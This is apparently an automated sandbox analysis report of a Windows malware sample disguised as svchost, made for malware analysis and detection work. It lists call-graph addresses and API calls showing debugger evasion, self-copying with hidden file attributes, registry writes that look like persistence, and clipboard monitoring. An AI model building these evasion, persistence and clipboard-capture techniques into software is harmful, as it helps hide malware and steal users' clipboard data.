_parse_cmdline 76 API calls 9941->9942 9945 411c26 9941->9945 9942->9941 9943 411d24 9943->9845 9944 413a75 76 API calls _parse_cmdline 9944->9945 9945->9943 9945->9944 9948 4114d6 __IsNonwritableInCurrentImage 9946->9948 10471 4136e3 9948->10471 9949 4114f4 __initterm_e 9950 4110cb __cinit 76 API calls 9949->9950 9951 411515 __IsNonwritableInCurrentImage 9949->9951 9950->9951 9951->9849 9953 411a6d 9952->9953 9956 411a72 9952->9956 9954 410039 ___initmbctable 94 API calls 9953->9954 9954->9956 9955 40f7f4 9958 40deb0 IsDebuggerPresent 9955->9958 9956->9955 9957 413a75 _parse_cmdline 76 API calls 9956->9957 9957->9956 9959 40def4 9958->9959 9960 40df0a 9958->9960 9959->9856 9997 41169f 9959->9997 10474 401100 9960->10474 9963 40dfb0 10481 40de20 9963->10481 9964 40df45 GetPEB 9964->9959 9967 40dfe2 10529 40d7f0 9967->10529 9968 40dfdc 9968->9967 9970 40dfec 9968->9970 9972 40e049 9970->9972 10491 40f476 9970->10491 9972->9959 9974 40e0b1 LocalFree 9972->9974 9974->9959 9976 40e04e 9979 40f476 __wcsicoll 78 API calls 9976->9979 9977 40e00e 9978 40e02c 9977->9978 9981 40f476 __wcsicoll 78 API calls 9977->9981 10499 405b10 9978->10499 9980 40e05f 9979->9980 9983 40e0a6 9980->9983 9984 40e066 9980->9984 9981->9978 9986 40d7f0 92 API calls 9983->9986 9985 40e084 9984->9985 9987 40f476 __wcsicoll 78 API calls 9984->9987 10571 405e10 9985->10571 9986->9972 9987->9985 9990 40f6e0 9989->9990 9991 40f6db 9989->9991 9993 41172d __NMSG_WRITE 66 API calls 9990->9993 9992 4118dc __FF_MSGBANNER 66 API calls 9991->9992 9992->9990 9994 40f6e8 9993->9994 9995 411447 _fast_error_exit 3 API calls 9994->9995 9996 40f6f2 9995->9996 9996->9827 9998 41155f _doexit 66 API calls 9997->9998 9999 4116b0 9998->9999 9999->9856 10001 41155f _doexit 66 API calls 10000->10001 10002 4116d6 10001->10002 10002->9859 10004 4103e0 DecodePointer 10003->10004 10005 4103ef 10003->10005 10004->10005 10006 410400 TlsFree 10005->10006 10007 41040e 10005->10007 10006->10007 10008 4125e7 DeleteCriticalSection 
10007->10008 10009 4125ff 10007->10009 10010 410cbb _free 66 API calls 10008->10010 10011 412611 DeleteCriticalSection 10009->10011 10012 4106a2 10009->10012 10010->10007 10011->10009 10012->9830 10022 410390 EncodePointer 10013->10022 10015 411479 __init_pointers __initp_misc_winsig 10023 4134af EncodePointer 10015->10023 10017 410754 EncodePointer EncodePointer EncodePointer EncodePointer 10018 412581 10017->10018 10019 41258c 10018->10019 10020 412596 InitializeCriticalSectionAndSpinCount 10019->10020 10021 410793 10019->10021 10020->10019 10020->10021 10021->9876 10021->9877 10022->10015 10023->10017 10026 411bb9 10024->10026 10028 411c26 10026->10028 10034 413a75 10026->10034 10027 411d24 10027->9920 10027->9921 10028->10027 10029 413a75 76 API calls _parse_cmdline 10028->10029 10029->10028 10031 410042 10030->10031 10033 410049 10030->10033 10358 40fe9f 10031->10358 10033->9915 10037 413a22 10034->10037 10040 40e551 10037->10040 10041 40e564 10040->10041 10047 40e5b1 10040->10047 10048 410540 10041->10048 10044 40e591 10044->10047 10068 40fb96 10044->10068 10047->10026 10049 4104c7 __getptd_noexit 66 API calls 10048->10049 10050 410548 10049->10050 10051 40e569 10050->10051 10052 4116e9 __amsg_exit 66 API calls 10050->10052 10051->10044 10053 410317 10051->10053 10052->10051 10054 410323 ___FrameUnwindToState 10053->10054 10055 410540 __getptd 66 API calls 10054->10055 10056 410328 10055->10056 10057 410356 10056->10057 10058 41033a 10056->10058 10059 4126fb __lock 66 API calls 10057->10059 10060 410540 __getptd 66 API calls 10058->10060 10061 41035d 10059->10061 10064 41033f 10060->10064 10084 4102ca 10061->10084 10066 41034d ___FrameUnwindToState 10064->10066 10067 4116e9 __amsg_exit 66 API calls 10064->10067 10066->10044 10067->10066 10069 40fba2 ___FrameUnwindToState 10068->10069 10070 410540 __getptd 66 API calls 10069->10070 10071 40fba7 10070->10071 10072 4126fb __lock 66 API calls 10071->10072 10080 40fbb9 10071->10080 10075 40fbd7 10072->10075 10073 
40fbc7 ___FrameUnwindToState 10073->10047 10074 40fc20 10354 40fc31 10074->10354 10075->10074 10078 40fc08 InterlockedIncrement 10075->10078 10079 40fbee InterlockedDecrement 10075->10079 10076 4116e9 __amsg_exit 66 API calls 10076->10073 10078->10074 10079->10078 10081 40fbf9 10079->10081 10080->10073 10080->10076 10081->10078 10082 410cbb _free 66 API calls 10081->10082 10083 40fc07 10082->10083 10083->10078 10085 4102d7 10084->10085 10086 41030c 10084->10086 10085->10086 10087 410057 ___addlocaleref 8 API calls 10085->10087 10092 410384 10086->10092 10088 4102ed 10087->10088 10088->10086 10095 4100e6 10088->10095 10353 412622 LeaveCriticalSection 10092->10353 10094 41038b 10094->10064 10096 4100f7 InterlockedDecrement 10095->10096 10097 41017a 10095->10097 10098 41010c InterlockedDecrement 10096->10098 10099 41010f 10096->10099 10097->10086 10109 41017f 10097->10109 10098->10099 10100 410119 InterlockedDecrement 10099->10100 10101 41011c 10099->10101 10100->10101 10102 410126 InterlockedDecrement 10101->10102 10103 410129 10101->10103 10102->10103 10104 410133 InterlockedDecrement 10103->10104 10105 410136 10103->10105 10104->10105 10106 41014f InterlockedDecrement 10105->10106 10107 41015f InterlockedDecrement 10105->10107 10108 41016a InterlockedDecrement 10105->10108 10106->10105 10107->10105 10108->10097 10110 410203 10109->10110 10111 410196 10109->10111 10112 410250 10110->10112 10113 410cbb _free 66 API calls 10110->10113 10111->10110 10119 410cbb _free 66 API calls 10111->10119 10122 4101ca 10111->10122 10124 410279 10112->10124 10179 41280d 10112->10179 10115 410224 10113->10115 10117 410cbb _free 66 API calls 10115->10117 10123 410237 10117->10123 10118 410cbb _free 66 API calls 10125 4101f8 10118->10125 10126 4101bf 10119->10126 10120 410cbb _free 66 API calls 10120->10124 10121 4102be 10127 410cbb _free 66 API calls 10121->10127 10128 410cbb _free 66 API calls 10122->10128 10138 4101eb 10122->10138 10130 410cbb _free 66 API calls 10123->10130 
10124->10121 10129 410cbb 66 API calls _free 10124->10129 10131 410cbb _free 66 API calls 10125->10131 10139 412bed 10126->10139 10133 4102c4 10127->10133 10134 4101e0 10128->10134 10129->10124 10135 410245 10130->10135 10131->10110 10133->10086 10167 412b84 10134->10167 10137 410cbb _free 66 API calls 10135->10137 10137->10112 10138->10118 10140 412ce7 10139->10140 10141 412bfe 10139->10141 10140->10122 10142 412c0f 10141->10142 10143 410cbb _free 66 API calls 10141->10143 10144 412c21 10142->10144 10146 410cbb _free 66 API calls 10142->10146 10143->10142 10145 412c33 10144->10145 10147 410cbb _free 66 API calls 10144->10147 10148 412c45 10145->10148 10149 410cbb _free 66 API calls 10145->10149 10146->10144 10147->10145 10150 412c57 10148->10150 10151 410cbb _free 66 API calls 10148->10151 10149->10148 10152 412c69 10150->10152 10154 410cbb _free 66 API calls 10150->10154 10151->10150 10153 412c7b 10152->10153 10155 410cbb _free 66 API calls 10152->10155 10156 412c8d 10153->10156 10157 410cbb _free 66 API calls 10153->10157 10154->10152 10155->10153 10158 412c9f 10156->10158 10159 410cbb _free 66 API calls 10156->10159 10157->10156 10160 412cb1 10158->10160 10162 410cbb _free 66 API calls 10158->10162 10159->10158 10161 412cc3 10160->10161 10163 410cbb _free 66 API calls 10160->10163 10164 412cd5 10161->10164 10165 410cbb _free 66 API calls 10161->10165 10162->10160 10163->10161 10164->10140 10166 410cbb _free 66 API calls 10164->10166 10165->10164 10166->10140 10169 412b91 10167->10169 10178 412be9 10167->10178 10168 412ba1 10171 412bb3 10168->10171 10172 410cbb _free 66 API calls 10168->10172 10169->10168 10170 410cbb _free 66 API calls 10169->10170 10170->10168 10173 412bc5 10171->10173 10175 410cbb _free 66 API calls 10171->10175 10172->10171 10174 412bd7 10173->10174 10176 410cbb _free 66 API calls 10173->10176 10177 410cbb _free 66 API calls 10174->10177 10174->10178 10175->10173 10176->10174 10177->10178 10178->10138 10180 41026e 10179->10180 10181 41281e 
10179->10181 10180->10120 10182 410cbb _free 66 API calls 10181->10182 10183 412826 10182->10183 10184 410cbb _free 66 API calls 10183->10184 10185 41282e 10184->10185 10186 410cbb _free 66 API calls 10185->10186 10187 412836 10186->10187 10188 410cbb _free 66 API calls 10187->10188 10189 41283e 10188->10189 10190 410cbb _free 66 API calls 10189->10190 10191 412846 10190->10191 10192 410cbb _free 66 API calls 10191->10192 10193 41284e 10192->10193 10194 410cbb _free 66 API calls 10193->10194 10195 412855 10194->10195 10196 410cbb _free 66 API calls 10195->10196 10197 41285d 10196->10197 10198 410cbb _free 66 API calls 10197->10198 10199 412865 10198->10199 10200 410cbb _free 66 API calls 10199->10200 10201 41286d 10200->10201 10202 410cbb _free 66 API calls 10201->10202 10203 412875 10202->10203 10204 410cbb _free 66 API calls 10203->10204 10205 41287d 10204->10205 10206 410cbb _free 66 API calls 10205->10206 10207 412885 10206->10207 10208 410cbb _free 66 API calls 10207->10208 10209 41288d 10208->10209 10210 410cbb _free 66 API calls 10209->10210 10211 412895 10210->10211 10212 410cbb _free 66 API calls 10211->10212 10213 41289d 10212->10213 10214 410cbb _free 66 API calls 10213->10214 10215 4128a8 10214->10215 10216 410cbb _free 66 API calls 10215->10216 10217 4128b0 10216->10217 10218 410cbb _free 66 API calls 10217->10218 10219 4128b8 10218->10219 10220 410cbb _free 66 API calls 10219->10220 10221 4128c0 10220->10221 10222 410cbb _free 66 API calls 10221->10222 10223 4128c8 10222->10223 10224 410cbb _free 66 API calls 10223->10224 10225 4128d0 10224->10225 10226 410cbb _free 66 API calls 10225->10226 10227 4128d8 10226->10227 10228 410cbb _free 66 API calls 10227->10228 10229 4128e0 10228->10229 10230 410cbb _free 66 API calls 10229->10230 10231 4128e8 10230->10231 10232 410cbb _free 66 API calls 10231->10232 10233 4128f0 10232->10233 10234 410cbb _free 66 API calls 10233->10234 10235 4128f8 10234->10235 10236 410cbb _free 66 API calls 10235->10236 10237 
412900 10236->10237 10238 410cbb _free 66 API calls 10237->10238 10239 412908 10238->10239 10240 410cbb _free 66 API calls 10239->10240 10241 412910 10240->10241 10242 410cbb _free 66 API calls 10241->10242 10243 412918 10242->10243 10244 410cbb _free 66 API calls 10243->10244 10245 412920 10244->10245 10246 410cbb _free 66 API calls 10245->10246 10247 41292e 10246->10247 10248 410cbb _free 66 API calls 10247->10248 10249 412939 10248->10249 10250 410cbb _free 66 API calls 10249->10250 10251 412944 10250->10251 10252 410cbb _free 66 API calls 10251->10252 10253 41294f 10252->10253 10254 410cbb _free 66 API calls 10253->10254 10255 41295a 10254->10255 10256 410cbb _free 66 API calls 10255->10256 10257 412965 10256->10257 10258 410cbb _free 66 API calls 10257->10258 10259 412970 10258->10259 10260 410cbb _free 66 API calls 10259->10260 10261 41297b 10260->10261 10262 410cbb _free 66 API calls 10261->10262 10263 412986 10262->10263 10264 410cbb _free 66 API calls 10263->10264 10265 412991 10264->10265 10266 410cbb _free 66 API calls 10265->10266 10267 41299c 10266->10267 10268 410cbb _free 66 API calls 10267->10268 10269 4129a7 10268->10269 10270 410cbb _free 66 API calls 10269->10270 10271 4129b2 10270->10271 10272 410cbb _free 66 API calls 10271->10272 10273 4129bd 10272->10273 10274 410cbb _free 66 API calls 10273->10274 10275 4129c8 10274->10275 10276 410cbb _free 66 API calls 10275->10276 10277 4129d3 10276->10277 10278 410cbb _free 66 API calls 10277->10278 10279 4129e1 10278->10279 10280 410cbb _free 66 API calls 10279->10280 10281 4129ec 10280->10281 10282 410cbb _free 66 API calls 10281->10282 10283 4129f7 10282->10283 10284 410cbb _free 66 API calls 10283->10284 10285 412a02 10284->10285 10286 410cbb _free 66 API calls 10285->10286 10287 412a0d 10286->10287 10288 410cbb _free 66 API calls 10287->10288 10289 412a18 10288->10289 10290 410cbb _free 66 API calls 10289->10290 10291 412a23 10290->10291 10292 410cbb _free 66 API calls 10291->10292 10293 412a2e 
10292->10293 10294 410cbb _free 66 API calls 10293->10294 10295 412a39 10294->10295 10296 410cbb _free 66 API calls 10295->10296 10297 412a44 10296->10297 10298 410cbb _free 66 API calls 10297->10298 10299 412a4f 10298->10299 10300 410cbb _free 66 API calls 10299->10300 10301 412a5a 10300->10301 10302 410cbb _free 66 API calls 10301->10302 10303 412a65 10302->10303 10304 410cbb _free 66 API calls 10303->10304 10305 412a70 10304->10305 10306 410cbb _free 66 API calls 10305->10306 10307 412a7b 10306->10307 10308 410cbb _free 66 API calls 10307->10308 10309 412a86 10308->10309 10310 410cbb _free 66 API calls 10309->10310 10311 412a94 10310->10311 10312 410cbb _free 66 API calls 10311->10312 10313 412a9f 10312->10313 10314 410cbb _free 66 API calls 10313->10314 10315 412aaa 10314->10315 10316 410cbb _free 66 API calls 10315->10316 10317 412ab5 10316->10317 10318 410cbb _free 66 API calls 10317->10318 10319 412ac0 10318->10319 10320 410cbb _free 66 API calls 10319->10320 10321 412acb 10320->10321 10322 410cbb _free 66 API calls 10321->10322 10323 412ad6 10322->10323 10324 410cbb _free 66 API calls 10323->10324 10325 412ae1 10324->10325 10326 410cbb _free 66 API calls 10325->10326 10327 412aec 10326->10327 10328 410cbb _free 66 API calls 10327->10328 10329 412af7 10328->10329 10330 410cbb _free 66 API calls 10329->10330 10331 412b02 10330->10331 10332 410cbb _free 66 API calls 10331->10332 10333 412b0d 10332->10333 10334 410cbb _free 66 API calls 10333->10334 10335 412b18 10334->10335 10336 410cbb _free 66 API calls 10335->10336 10337 412b23 10336->10337 10338 410cbb _free 66 API calls 10337->10338 10339 412b2e 10338->10339 10340 410cbb _free 66 API calls 10339->10340 10341 412b39 10340->10341 10342 410cbb _free 66 API calls 10341->10342 10343 412b47 10342->10343 10344 410cbb _free 66 API calls 10343->10344 10345 412b52 10344->10345 10346 410cbb _free 66 API calls 10345->10346 10347 412b5d 10346->10347 10348 410cbb _free 66 API calls 10347->10348 10349 412b68 
10348->10349 10350 410cbb _free 66 API calls 10349->10350 10351 412b73 10350->10351 10352 410cbb _free 66 API calls 10351->10352 10352->10180 10353->10094 10357 412622 LeaveCriticalSection 10354->10357 10356 40fc38 10356->10080 10357->10356 10359 40feab ___FrameUnwindToState 10358->10359 10360 410540 __getptd 66 API calls 10359->10360 10361 40feb4 10360->10361 10362 40fb96 _LocaleUpdate::_LocaleUpdate 68 API calls 10361->10362 10363 40febe 10362->10363 10389 40fc3a 10363->10389 10366 41272e __malloc_crt 66 API calls 10367 40fedf 10366->10367 10368 40fffe ___FrameUnwindToState 10367->10368 10396 40fcb6 10367->10396 10368->10033 10371 41000b 10371->10368 10375 41001e 10371->10375 10377 410cbb _free 66 API calls 10371->10377 10372 40ff0f InterlockedDecrement 10373 40ff30 InterlockedIncrement 10372->10373 10374 40ff1f 10372->10374 10373->10368 10376 40ff46 10373->10376 10374->10373 10379 410cbb _free 66 API calls 10374->10379 10378 410b21 _raise 66 API calls 10375->10378 10376->10368 10380 4126fb __lock 66 API calls 10376->10380 10377->10375 10378->10368 10381 40ff2f 10379->10381 10383 40ff5a InterlockedDecrement 10380->10383 10381->10373 10384 40ffd6 10383->10384 10385 40ffe9 InterlockedIncrement 10383->10385 10384->10385 10387 410cbb _free 66 API calls 10384->10387 10406 410000 10385->10406 10388 40ffe8 10387->10388 10388->10385 10390 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10389->10390 10391 40fc4e 10390->10391 10392 40fc77 10391->10392 10393 40fc59 GetOEMCP 10391->10393 10394 40fc7c GetACP 10392->10394 10395 40fc69 10392->10395 10393->10395 10394->10395 10395->10366 10395->10368 10397 40fc3a getSystemCP 78 API calls 10396->10397 10398 40fcd6 10397->10398 10401 40fd25 IsValidCodePage 10398->10401 10403 40fce1 setSBCS 10398->10403 10405 40fd4a _memset __setmbcp_nolock 10398->10405 10399 40e542 __ld12tod 5 API calls 10400 40fe9d 10399->10400 10400->10371 10400->10372 10402 40fd37 GetCPInfo 10401->10402 10401->10403 10402->10403 10402->10405 10403->10399 10409 
40fa06 GetCPInfo 10405->10409 10470 412622 LeaveCriticalSection 10406->10470 10408 410007 10408->10368 10411 40fa3a _memset 10409->10411 10418 40faee 10409->10418 10419 412541 10411->10419 10413 40e542 __ld12tod 5 API calls 10416 40fb94 10413->10416 10416->10405 10417 41134c ___crtLCMapStringA 82 API calls 10417->10418 10418->10413 10420 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10419->10420 10421 412554 10420->10421 10429 41245a 10421->10429 10424 41134c 10425 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10424->10425 10426 41135f 10425->10426 10446 411165 10426->10446 10430 412483 MultiByteToWideChar 10429->10430 10431 412478 10429->10431 10434 4124b0 10430->10434 10441 4124ac 10430->10441 10431->10430 10432 40e542 __ld12tod 5 API calls 10435 40faa9 10432->10435 10433 4124c5 _memset __crtGetStringTypeA_stat 10437 4124fe MultiByteToWideChar 10433->10437 10433->10441 10434->10433 10436 410b93 _malloc 66 API calls 10434->10436 10435->10424 10436->10433 10438 412525 10437->10438 10439 412514 GetStringTypeW 10437->10439 10442 40f127 10438->10442 10439->10438 10441->10432 10443 40f133 10442->10443 10444 40f144 10442->10444 10443->10444 10445 410cbb _free 66 API calls 10443->10445 10444->10441 10445->10444 10448 411183 MultiByteToWideChar 10446->10448 10449 4111e1 10448->10449 10453 4111e8 10448->10453 10450 40e542 __ld12tod 5 API calls 10449->10450 10452 40fac9 10450->10452 10451 411235 MultiByteToWideChar 10454 41132d 10451->10454 10455 41124e LCMapStringW 10451->10455 10452->10417 10456 410b93 _malloc 66 API calls 10453->10456 10459 411201 __crtGetStringTypeA_stat 10453->10459 10457 40f127 __freea 66 API calls 10454->10457 10455->10454 10458 41126d 10455->10458 10456->10459 10457->10449 10460 411277 10458->10460 10463 4112a0 10458->10463 10459->10449 10459->10451 10460->10454 10461 41128b LCMapStringW 10460->10461 10461->10454 10462 4112ef LCMapStringW 10465 411305 WideCharToMultiByte 10462->10465 10466 411327 10462->10466 10464 410b93 _malloc 66 API calls 
10463->10464 10467 4112bb __crtGetStringTypeA_stat 10463->10467 10464->10467 10465->10466 10468 40f127 __freea 66 API calls 10466->10468 10467->10454 10467->10462 10468->10454 10470->10408 10472 4136e9 EncodePointer 10471->10472 10472->10472 10473 413703 10472->10473 10473->9949 10475 401000 10474->10475 10476 401117 GetModuleHandleA 10475->10476 10477 40112a 10476->10477 10480 401163 10476->10480 10478 401134 GetProcAddress 10477->10478 10479 40114b GetCurrentProcess NtQueryInformationProcess 10478->10479 10478->10480 10479->10480 10480->9959 10480->9963 10480->9964 10579 401090 10481->10579 10484 40de84 SetErrorMode 10589 40d440 GetSystemTime 10484->10589 10485 40de55 _wcsrchr 10485->10484 10488 40de6f SetCurrentDirectoryW 10485->10488 10488->10484 10489 40e542 __ld12tod 5 API calls 10490 40de9e GetCommandLineW CommandLineToArgvW 10489->10490 10490->9967 10490->9968 10492 40f485 10491->10492 10493 40f4ee 10491->10493 10495 410b21 _raise 66 API calls 10492->10495 10496 40e007 10492->10496 10617 40f373 10493->10617 10497 40f491 10495->10497 10496->9976 10496->9977 10498 410acf _raise 11 API calls 10497->10498 10498->10496 10500 405b35 10499->10500 10526 405b2e 10499->10526 10501 405b5e GetPEB 10500->10501 10500->10526 10503 405b88 GetPEB 10501->10503 10501->10526 10502 40e542 __ld12tod 5 API calls 10504 405e0c 10502->10504 10505 405bb6 _memset 10503->10505 10503->10526 10504->9972 10506 405bd3 GetCurrentThread GetThreadContext 10505->10506 10507 405bf8 10506->10507 10508 401090 4 API calls 10507->10508 10507->10526 10509 405c3c 10508->10509 10632 40e120 10509->10632 10512 405c5a 10514 405c67 GetModuleHandleA 10512->10514 10515 405d28 10512->10515 10513 405c4f GetModuleHandleA 10513->10512 10516 405c81 LoadLibraryA 10514->10516 10517 405c92 GetProcAddress GetProcAddress 10514->10517 10520 405d41 OpenMutexA 10515->10520 10521 405d97 10515->10521 10515->10526 10516->10517 10518 405cc9 10517->10518 10519 405cde GetProcAddress GetProcAddress 10517->10519 10518->10519 
10522 405cd2 10518->10522 10519->10515 10519->10522 10523 405d62 CloseHandle 10520->10523 10524 405d76 CreateMutexA 10520->10524 10528 405dd1 10521->10528 10638 4058a0 10521->10638 10522->10515 10523->10526 10524->10521 10524->10526 10525 405de5 CloseHandle 10525->10526 10526->10502 10528->10525 10528->10526 10530 40d81f _memset 10529->10530 10531 40d87e GetModuleFileNameW 10530->10531 10534 40d8a0 _wcsrchr 10531->10534 10567 40d899 10531->10567 10532 40e542 __ld12tod 5 API calls 10533 40de0e 10532->10533 10533->9972 10535 40f501 __NMSG_WRITE 66 API calls 10534->10535 10534->10567 10536 40d932 SHGetFolderPathW 10535->10536 10537 40d964 10536->10537 10538 40d94e 10536->10538 10692 40f5ce 10537->10692 10539 40f643 __NMSG_WRITE 66 API calls 10538->10539 10539->10537 10542 40f5ce __NMSG_WRITE 66 API calls 10543 40d998 CreateDirectoryW 10542->10543 10544 40d9c2 SetFileAttributesW 10543->10544 10545 40d9ae GetLastError 10543->10545 10546 40f5ce __NMSG_WRITE 66 API calls 10544->10546 10545->10544 10545->10567 10547 40d9e7 10546->10547 10548 40f5ce __NMSG_WRITE 66 API calls 10547->10548 10549 40da02 10548->10549 10550 40f5ce __NMSG_WRITE 66 API calls 10549->10550 10551 40da1b CopyFileW 10550->10551 10552 40da3f SetFileAttributesW 10551->10552 10551->10567 10553 40f5ce __NMSG_WRITE 66 API calls 10552->10553 10554 40da66 10553->10554 10555 40f5ce __NMSG_WRITE 66 API calls 10554->10555 10556 40da7f RegCreateKeyExW 10555->10556 10557 40db4b 10556->10557 10558 40dabd RegSetValueExW RegCloseKey 10556->10558 10559 40dc12 10557->10559 10560 40db5a RegCreateKeyExW 10557->10560 10558->10557 10569 40dc29 _wcsrchr 10559->10569 10701 40d6d0 10559->10701 10560->10559 10561 40db84 RegSetValueExW RegCloseKey 10560->10561 10561->10559 10565 40dd85 _memset 10566 40dd99 CreateProcessW 10565->10566 10566->10567 10568 40dde4 CloseHandle CloseHandle 10566->10568 10567->10532 10568->10567 10569->10565 10569->10567 10569->10569 10570 40dd60 CopyFileW SetFileAttributesW 10569->10570 10570->10565 

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AddClipboardFormatListener$ChangeClipboardChain$RemoveClipboardFormatListener$SetClipboardViewer$cC0inHj$user32.dll
                                      • API String ID: 0-2614838119
                                      • Opcode ID: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction ID: e4e5dd0de9f09d90ee084e7cb90bd22076d3a6f0aa843fabeb84720459f47b48
                                      • Opcode Fuzzy Hash: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction Fuzzy Hash: BF717D74A442589BEB209F20DC4DBEA7BB4EB14305F4484BBE44A762E1C77C8AC5DF19

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E175
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E17F
                                      • AddClipboardFormatListener.USER32(00000000), ref: 0040595B
                                      • DestroyWindow.USER32(00000000), ref: 00405969
                                      • GetLastError.KERNEL32 ref: 0040599F
                                      • DestroyWindow.USER32(00000000), ref: 004059AD
                                      • WaitForSingleObject.KERNEL32(000000F0,00000000,81C72413), ref: 004059D2
                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00405A0F
                                      • TranslateMessage.USER32(?), ref: 00405A1D
                                      • DispatchMessageA.USER32(?), ref: 00405A27
                                      • Sleep.KERNELBASE(00000014), ref: 00405A31
                                      • RemoveClipboardFormatListener.USER32(00000000), ref: 00405A67
                                      • DestroyWindow.USER32(00000000), ref: 00405A71
                                      • ReleaseMutex.KERNEL32(000000F0), ref: 00405A8E
                                      Strings
                                      Similarity
                                      • API ID: DestroyMessageWindow$ClipboardFormatListener_rand$DispatchErrorLastMutexObjectPeekReleaseRemoveSingleSleepTranslateWait
                                      • String ID: hlcmbvlqbap
                                      • API String ID: 2075554847-1307111509
                                      • Opcode ID: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction ID: 4f33caf6bca9ddad8697e74e62c9060a71084bf4d8c7d1bdb57def999465fb8c
                                      • Opcode Fuzzy Hash: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction Fuzzy Hash: 92515BB0A00604DBDB20DFA4DC88BAFBBB4FB54714F14463AE506A62E0D7799905CF29

                                      Control-flow Graph

                                      APIs
                                      • IsDebuggerPresent.KERNEL32(81C72413), ref: 0040DEEA
                                      Strings
                                      Similarity
                                      • API ID: DebuggerPresent
                                      • String ID: --check$--config$--run
                                      • API String ID: 1347740429-1715824448
                                      • Opcode ID: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction ID: a6e4f3225be8be52f133a3bd3a6e0bcae41296a009743188dca9600d065854ff
                                      • Opcode Fuzzy Hash: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction Fuzzy Hash: D4518871D04218DBDB24CFA6D844BEEBBB4BB08314F14862AE811B73C0D37D9905CBA9

                                      Control-flow Graph

                                      APIs
                                      • KillTimer.USER32(?,57AE0D82), ref: 00405839
                                      • PostQuitMessage.USER32(00000000), ref: 00405863
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0040587D
                                      Similarity
                                      • API ID: KillMessagePostProcQuitTimerWindow
                                      • String ID:
                                      • API String ID: 2965130154-0
                                      • Opcode ID: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction ID: 28f21435e46fd2e830124e72743dc58a12090b41100468ac95c48544234bd2ff
                                      • Opcode Fuzzy Hash: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction Fuzzy Hash: 58518435A00548DFDB24EF60DC48B9B77B4FB04354F4486BAE80AA62D0C7789A95CF59

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040111B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040113C
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00401155
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040115C
                                      Strings
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction ID: a6687a9151404b893926094712e7bd645b6c75322a1efd05145472f72e85e0e4
                                      • Opcode Fuzzy Hash: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction Fuzzy Hash: 6101ADB0E40208BBDF10AFF0AC0DBDE7B789B08709F104176E611B62E1D2795A44DB2A

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 004011DC
                                      Strings
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction ID: f3a3b2490c05c86b39bee9860363372222596c46706d0865df52a15b71608fee
                                      • Opcode Fuzzy Hash: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction Fuzzy Hash: E00186B0D40208BBDF149FE0DC4DBDD7BB89B08349F104076E601B62E1D6785754DB5A

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040125C
                                      Strings
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
